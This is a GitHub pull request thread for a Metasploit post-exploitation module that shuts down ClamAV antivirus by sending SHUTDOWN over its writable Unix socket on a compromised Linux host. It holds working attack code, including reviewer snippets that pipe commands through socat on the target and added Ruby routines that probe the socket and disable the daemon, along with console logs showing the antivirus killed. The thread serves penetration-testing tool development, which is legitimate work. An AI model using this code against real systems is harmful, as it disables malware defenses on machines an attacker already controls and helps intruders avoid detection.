
Disable clamav via unix socket #17672

Merged

jheysel-r7 merged 11 commits into rapid7:master from archcloudlabs:disable_clamav_via_unix_socket
Feb 24, 2023

Conversation

@archcloudlabs (Contributor)

This PR includes an additional Metasploit module that will disable ClamAV on Linux systems.
The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command, which will disable ClamAV.

This bug is referenced in an open PR in the ClamAV repo here.

This module differs from clamav_control as it requires a Unix socket to interact with.

Verification

List the steps needed to make sure this thing works

### Shutting off ClamAV
  1. Launch `msfconsole`
  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
  3. Do: `use post/linux/manage/disable_clamav`
  4. Do: `set SESSION <session number on the Linux host>`
  5. Do: `exploit -j`
  6. The daemon should be shut off.

## Scenarios

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   SESSION             4                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

clamav    132021       1 16 18:51 ?        00:00:09 clamd
dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd

Video

A walk through demonstrating this module can be seen here.
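The behaviour the description above relies on, as an added example that is not the PR's module code: a plain-Ruby clamd client over a Unix socket, a check of the socket file's mode (connecting to a Unix socket needs write permission on it, which is why a world-writable socket lets any local user talk to the daemon), and a constructed stand-in daemon so the whole thing runs offline. It assumes clamd's 'n'-prefixed, newline-terminated command framing, that PING is answered with PONG, and that SHUTDOWN makes the daemon exit; the stand-in mimics only that much. The temporary path and the 0666 mode are illustrative.

```ruby
# Added example, not the PR's module: a minimal clamd-protocol client over a
# Unix socket, a permission check on the socket file, and a stand-in clamd
# (constructed here) so the whole thing runs offline.
require 'socket'
require 'tmpdir'

# clamd accepts commands prefixed with 'n' and terminated by a newline
# (e.g. "nPING\n" -> "PONG\n"). Returns the reply without its newline, or ""
# if the daemon closed the connection without answering (what SHUTDOWN does).
def clamd_command(socket_path, command)
  UNIXSocket.open(socket_path) do |sock|
    sock.write("n#{command}\n")
    sock.close_write
    sock.read.to_s.chomp
  end
end

# connect(2) on a Unix socket requires write permission on the socket file,
# so the file mode decides who may talk to clamd at all.
def socket_exposure(socket_path)
  st = File.stat(socket_path)
  mode = st.mode & 0o777
  {
    socket: st.socket?,
    mode: format('%04o', mode),
    world_writable: (mode & 0o002) != 0,
    group_writable: (mode & 0o020) != 0,
    writable_by_me: File.writable?(socket_path)
  }
end

# Stand-in for clamd, constructed for this example: answers PING/VERSION and
# exits cleanly on SHUTDOWN, which is the behaviour the module abuses.
# Returns the server thread; the socket file is removed when it exits.
def fake_clamd(socket_path, mode: 0o666)
  server = UNIXServer.new(socket_path)
  File.chmod(mode, socket_path)
  Thread.new do
    loop do
      client = server.accept
      cmd = client.gets.to_s.chomp
      case cmd
      when 'nPING' then client.write("PONG\n")
      when 'nVERSION' then client.write("fake-clamd 0.0\n")
      when 'nSHUTDOWN'
        client.close
        break
      else
        client.write("UNKNOWN COMMAND\n")
      end
      client.close
    end
    server.close
    File.delete(socket_path) if File.exist?(socket_path)
  end
end

# Walk through the sequence the module performs: inspect the socket, confirm
# the daemon is alive, send SHUTDOWN, and check that it is gone.
def demo(mode: 0o666)
  Dir.mktmpdir do |dir|
    path = File.join(dir, 'clamd.ctl')
    daemon = fake_clamd(path, mode: mode)
    result = { exposure: socket_exposure(path) }
    result[:ping] = clamd_command(path, 'PING')
    result[:shutdown_reply] = clamd_command(path, 'SHUTDOWN')
    daemon.join(5)
    result[:daemon_alive] = daemon.alive?
    result[:socket_present] = File.exist?(path)
    result
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Against a real host only the first two functions apply: point `socket_exposure` at `/run/clamav/clamd.ctl` to see whether `world_writable` is what lets an unprivileged account reach the daemon, and `clamd_command(path, 'PING')` tells you whether it is listening before you send anything destructive. On the defending side the socket's owner group and mode are set by the `LocalSocketGroup` and `LocalSocketMode` options in clamd.conf; `demo(mode: 0o660)` shows the same sequence with a group-restricted socket.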

Review comment on these lines of the module source:

```ruby
if writable?(datastore[CLAMAV_UNIX_SOCKET].to_s)
  print_good('File does exist and is writable!')

  Socket.unix(datastore[CLAMAV_UNIX_SOCKET].to_s) do |sock|
```
Contributor

Just to confirm - does this approach work against a remote target?

i.e. won't this only shut down a Socket on the current host machine, and not the remote target?

Contributor

For reference - here's an example of a module that uses socat that's available on the remote host to interact with the socket on the remote file system:

incoming_data = cmd_exec("echo '#{message}' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp")

And here's an example of using python that's on the remote host to interact with the remote socket:

upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'cve_2021_38648.py'))
cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"

It uploads the following python script:

https://github.com/rapid7/metasploit-framework/blob/db290369a4ba59744870e31e29c1d3eb4688fc97/data/exploits/CVE-2021-38648/cve_2021_38648.py

Contributor Author

> Just to confirm - does this approach work against a remote target?
>
> i.e. won't this only shut down a Socket on the current host machine, and not the remote target?

Correct, this is a post module to disable clamav after a linux host has been compromised.

Contributor

Thanks for the update!

As Metasploit won't always be running on the same host as the target, the module would have to be updated to also work remotely - like in the module examples above 👍

@archcloudlabs (Contributor Author), Feb 21, 2023

To clarify, this module is a post module meant to be executed through a Meterpreter session. The Meterpreter session can be on a remote host and this should still execute without issue.

Originally I interpreted "work on remote target" as "will this work against a ip:port combo?". My bad!

Contributor

Hey @archcloudlabs, I gave this a test with msfconsole running on one machine and clamav running on a separate machine, and I got the following error:

msf6 post(linux/manage/disable_clamav) > rexploit
[*] Reloading module...

[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[-] Post failed: Errno::ENOENT No such file or directory - connect(2) for /run/clamav/clamd.ctl
[-] Call stack:
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:64:in `connect'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:64:in `connect_internal'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:137:in `connect'
[-]   /Users/jheysel/.rvm/rubies/ruby-3.0.2/lib/ruby/3.0.0/socket.rb:1078:in `unix'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/linux/manage/disable_clamav.rb:38:in `run'
[*] Post module execution completed

I think this is the issue that @adfoster-r7 was trying to point out. As it's written, the module only works if msfconsole is running on the same machine you're trying to exploit.

`Socket.unix(datastore[CLAMAV_UNIX_SOCKET].to_s) do |sock|` interacts with the filesystem that msfconsole is running on and not specifically the filesystem the meterpreter session is running on. In your case, because you're running msfconsole on the same system as your meterpreter session and clamav, the exploit works. The examples posted above should help resolve this issue.

Please let us know if you'd like any further clarification, we're happy and here to help!

Contributor Author

Thank you for clarifying, I apologize for misunderstanding originally.
I've gone ahead and copied the F5 example and now check whether socat is on the target host before executing the SHUTDOWN command.
Let me know if this is sufficient!

@archcloudlabs (Contributor Author)

Updating output below

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  3         meterpreter x86/linux  vagrant @ ubuntu2004.localdomain  172.16.0.63:4444 -> 192.168.121.172:39132 (192.168.121.172)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   COMMAND             SHUTDOWN               yes       ClamAV command to execute
   SESSION             3                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > exploit

[+] socat exists
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[+] Sending SHUTDOWN...
[*] Post module execution completed
msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clam'
[*] exec: ps -ef | grep 'clam'

dllcoolj   43931    6670  0 21:54 pts/2    00:00:00 sh -c ps -ef | grep 'clam'
dllcoolj   43933   43931  0 21:54 pts/2    00:00:00 grep clam
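The local-versus-remote point the reviewers made, as an added example that is not the merged module: every probe and the socket write itself go through the session, here modelled as a callable `exec` standing in for Metasploit's `cmd_exec` (a shell command run on the host the session lives on, returning its output). A `UNIXSocket` opened in the module process would touch msfconsole's own filesystem instead, which is the `Errno::ENOENT` seen above. The `build_clamd_command`, `remote_socket_status` and `disable_clamav` names, the `fake_session` stand-in and its canned answers are constructed for this example; the socat pipeline follows the F5 snippet quoted earlier, with the command framed in clamd's 'n'-prefixed newline-terminated form.

```ruby
# Added example, not the merged module: the part that must run on the
# target. `exec` stands in for Metasploit's cmd_exec (a callable that runs a
# shell command on the session's host and returns its output).
require 'shellwords'

CLAMD_COMMANDS = %w[PING VERSION RELOAD SHUTDOWN].freeze

# Shell pipeline for the target: frame the command the way clamd expects
# ('n' prefix, newline terminator) and hand it to socat. The path is
# shell-escaped so a datastore value with spaces or quotes cannot break
# out of the command line.
def build_clamd_command(socket_path, command)
  raise ArgumentError, "unsupported clamd command: #{command}" unless CLAMD_COMMANDS.include?(command)

  "printf 'n#{command}\\n' | socat -t100 - UNIX-CONNECT:#{Shellwords.escape(socket_path)}"
end

# Every fact about the target comes back through exec: test(1) runs there,
# so these answers describe the remote socket, not the attacker's host.
def remote_socket_status(exec, socket_path)
  sock = Shellwords.escape(socket_path)
  {
    exists: exec.call("test -S #{sock} && echo yes || echo no").strip == 'yes',
    writable: exec.call("test -w #{sock} && echo yes || echo no").strip == 'yes',
    socat: !exec.call('command -v socat').strip.empty?
  }
end

# Preflight, then send. Returns a status symbol plus the probe results so a
# caller can report exactly why it stopped.
def disable_clamav(exec, socket_path, command: 'SHUTDOWN')
  status = remote_socket_status(exec, socket_path)
  return [:no_socket, status] unless status[:exists]
  return [:not_writable, status] unless status[:writable]
  return [:no_socat, status] unless status[:socat]

  reply = exec.call(build_clamd_command(socket_path, command)).strip
  [:sent, status.merge(reply: reply)]
end

# Constructed stand-in for a session: answers the probes above the way a
# host in the given state would. Replace with a real cmd_exec in a module.
def fake_session(socket_present: true, writable: true, socat: true)
  lambda do |cmd|
    case cmd
    when /\Atest -S / then socket_present ? "yes\n" : "no\n"
    when /\Atest -w / then writable ? "yes\n" : "no\n"
    when 'command -v socat' then socat ? "/usr/bin/socat\n" : ''
    when /UNIX-CONNECT:/ then "\n" # clamd closes the connection on SHUTDOWN without replying
    else raise "unexpected command: #{cmd}"
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  p disable_clamav(fake_session, '/run/clamav/clamd.ctl')
  p disable_clamav(fake_session(socat: false), '/run/clamav/clamd.ctl')
end
```

The ordering matters for an operator: a missing socket, a socket the session's user cannot write, and a target without socat are three different findings, and only the last one calls for uploading an alternative client such as the Python script linked earlier in the thread. Restricting `command` to a short allow-list keeps a typo in the datastore from sending clamd an arbitrary string.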

@jheysel-r7 jheysel-r7 merged commit 5749b40 into rapid7:master Feb 24, 2023
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 24, 2023
@jheysel-r7 (Contributor)

Release Notes

This PR includes a post module that will disable ClamAV on Linux systems.

@archcloudlabs (Contributor Author)

Thanks for all the pointers!

@jheysel-r7 (Contributor)

> Thanks for all the pointers!

Anytime! Thanks for the contribution 🙇


Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)
